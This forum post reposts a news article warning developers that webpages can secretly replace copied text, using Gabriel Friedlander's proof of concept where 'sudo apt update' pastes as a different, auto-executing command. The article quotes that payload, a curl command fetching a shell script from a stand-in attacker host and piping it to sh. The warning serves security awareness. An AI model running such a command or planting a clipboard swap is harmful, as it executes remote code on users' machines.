Gandalf_The_Grey
Level 76
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
- Apr 24, 2016
- 6,505
Programmers, sysadmins, security researchers, and tech hobbyists copying-pasting commands from web pages into a console or terminal are warned they risk having their system compromised.
A technologist demonstrates a simple trick that'll make you think twice before copying and pasting text from web pages.
Recently, Gabriel Friedlander, founder of security awareness training platform Wizer demonstrated an obvious yet surprising hack that'll make you cautious of copying-pasting commands from web pages.
It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal.
But Friedlander warns a webpage could be covertly replacing the contents of what goes on your clipboard, and what actually ends up being copied to your clipboard would be vastly different from what you had intended to copy.
Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late.
In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple command that most sysadmins and developers would be familiar with:
Now, paste what you copied from Friedlander's blog into a text box or Notepad, and the result is likely to leave you surprised:
curl http://attacker-domain:8000/shell.sh | sh
Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end of it.
This means the above example would execute as soon as it's pasted directly into a Linux terminal.
Those pasting the text may have been under the impression they were copying the familiar, innocuous command sudo apt update that is used to fetch updated information on software installed on your system.
But that's not quite what happened.
Last edited by a moderator: